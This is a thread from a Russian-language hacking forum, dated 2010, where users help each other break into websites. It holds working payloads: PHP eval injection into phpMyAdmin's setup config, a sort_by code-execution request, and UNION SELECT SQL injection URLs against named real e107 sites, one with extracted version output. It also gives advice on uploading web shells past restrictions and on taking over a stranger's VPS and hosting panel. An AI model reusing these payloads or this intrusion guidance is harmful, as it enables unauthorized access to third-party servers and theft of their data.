Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    ммммм, а какая связь между этим сплойтом и маджиками, процтите?)
     
  2. BlackFan

    BlackFan Member

    Joined:
    3 Jan 2009
    Messages:
    47
    Likes Received:
    40
    Reputations:
    32
    http://fragrance.org/ControlPanel/

    вроде вот она..
     
    1 person likes this.
  3. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    А ты посмотри ^_^
    Там кароче бага в чём, надо закрыть ковычку, и дописать свой код, а т.к. ковычка экранируется, нечего не получится. Ну на словах я Лев толстой, а на деле ... простой. Покажу.

    И так.
    Есть у нас создание конфига, там вписать можно небольшое количество параметров.
    Вообще без разницы куда вписывать, но лучше в host.
    Если мы пишем хост: localhost, то в конфиге.
    PHP:
    $host 'localhost';
    А нам же надо закрыть ковычку. Мы пишем значит, localhost'; eval($_GET[c]); //
    И получается нечто вроде:
    PHP:
    $host 'localhost\';eval($_GET[c]); //
    Э, куда ковычки деются? ПАШКЕЛЛА ПОХЕКАЛ МОЙ ПОСТ!

    Сам догадаешься причём там mq ?

    Или ты мне хочешь показать особые условия? :)
     
    #13663 Ctacok, 17 Jun 2010
    Last edited: 17 Jun 2010
  4. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    привет всем, есть одна проблема. Суть: Есть админка. Могу загружать файлы любых типов. Скрипты, doc, pdf, всякие идут в папку files, изображения в папку gallery. Но в папке files запрещены выполнение скриптов=(((. Что делать, посоветуйте пожалуйста...
     
  5. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    .htaccess залить,
    // Значит не судьба
     
    #13665 Ctacok, 17 Jun 2010
    Last edited: 17 Jun 2010
    1 person likes this.
  6. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    нет пробовал грит "файл с таким именем уже есть!"
     
  7. m0Hze

    m0Hze Well-Known Member

    Joined:
    1 Nov 2008
    Messages:
    266
    Likes Received:
    655
    Reputations:
    208
    Я не вникал в тему, но разве нельзя использовать {}?
    Что-то вроде:
    PHP:
    <?php
    $sting 
    = ${@eval($_REQUEST[c])};
    ?>
    Конечно, если я правильно, и речь идет о pma code exec. У меня спокойно срабатывал такой вариант, ведь там помоему используется preg_replace, второй аргумент которого находится в двойных кавычках, что дает нам право на подстановку иполняемых данных. Опять же, если я правильно въехал.
    //upd. Все верно, кавычки там идут лесом, вполне срабатывает такой запрос:
    Code:
    /phpmyadmin/server_databases.php?pos=0&dbstats=0&sort_by={${die(phpinfo())}}&sort_order=desc&token=1957
    
     
    #13667 m0Hze, 17 Jun 2010
    Last edited: 17 Jun 2010
  8. m0Hze

    m0Hze Well-Known Member

    Joined:
    1 Nov 2008
    Messages:
    266
    Likes Received:
    655
    Reputations:
    208
    В таком случае, поищи в админке LFI, очень часто именно в админской части сайта меньше всего защиты от атак. Достаточно часто сталкивался с таким способом заливки, когда льется только картинка, и хтаццесс не залить, то лил картинку набитую кодом шелла, и инклудил в админке.
     
  9. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    если в хтацессе прописаны запрещенные разрешения, то тести
    php phps php3 php5 phtml phps pht
     
    2 people like this.
  10. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Э, я про /scripts/setup.php, я другую багу имел ввиду.
     
  11. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    LFI на сайте и админке нигде нету, тестил расширения реультат 0 .....=((
     
  12. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Вот скуля в е107 модуле:
    http://www.lighterlifecommunity.co.uk/e107_plugins/userjournals_menu/userjournals.php?blog.-2719+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+--+
    Принтабельные поля: 3,5,7. Но почему когда вместо принтабельного поля вводишь например user() или version() ничего не выводит? И как организовать вывод?
     
  13. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    А там точно скуля? Ибо у меня всегда белая страница
     
  14. Failure

    Failure Elder - Старейшина

    Joined:
    21 Sep 2008
    Messages:
    179
    Likes Received:
    46
    Reputations:
    16
    http://www.lighterlifecommunity.co.uk/e107_plugins/userjournals_menu/userjournals.php?blog.-2719+union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13+--+
    5.0.81-log :rolleyes:
     
  15. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Ну типо ми тоже про /scripts/setup.php. На проверь:

    Code:
    http://www.melancholy.ru/phpmyadmin/scripts/setup.php
    
    и объясни мне все таки, юзал ли ты хоть раз этот сплойт и почему в данном случае (как и во всех других) он прекрасно работает и при magic_quotes=on

    Если мы вообще говорим об одном и том же сплойте:

    http://snipper.ru/view/12/phpmyadmin-2119-unserialize-arbitrary-php-code-execution-exploit/

    про который вообще-то изначально писал wildshaman
     
  16. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    А почему не работают обычные функции? Как например вывести данные из бд?
    Или вот другой пример:
    http://www.salvationprophecy.com/e107_plugins/userjournals_menu/userjournals.php?blog.-43++union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+--+
    там даже @@version не работает.
     
  17. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Да причём сплойт, ты на саму багу посмотри, как ты закроешь открытую ковычку?
     
  18. EoGeneo

    EoGeneo Member

    Joined:
    29 Aug 2009
    Messages:
    127
    Likes Received:
    9
    Reputations:
    1
    Скажу прямо...как узнать по имени домена где находится панель управления хостингом.
    Может у вас есть варианты...всё перерыл ничего не нашел. кудато попал...но там ни данных подключения ничего нет...прсото написано, что у вас есть хостинг и всё )
     
  19. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    whois -> dns.
    ну там далее пробьёшь хостера, у хостера спросишь адрес панели.
     
    #13679 Ctacok, 18 Jun 2010
    Last edited: 18 Jun 2010
    1 person likes this.
  20. EoGeneo

    EoGeneo Member

    Joined:
    29 Aug 2009
    Messages:
    127
    Likes Received:
    9
    Reputations:
    1
    Ага, спасибо так и сделал, хостер сказал что у вас домен резолвится на VPS ;) а впс не наш. вобщем я нашел этот впс, нашел ссылки до phpmyadmin и ispmanagera....есть много инофрмации о хозяине. но не знаю что дальше делать....тупик.
    Хотел восстановить на мыло пасы от ISP так оказывается нет такой функции...
     
Thread Status:
Not open for further replies.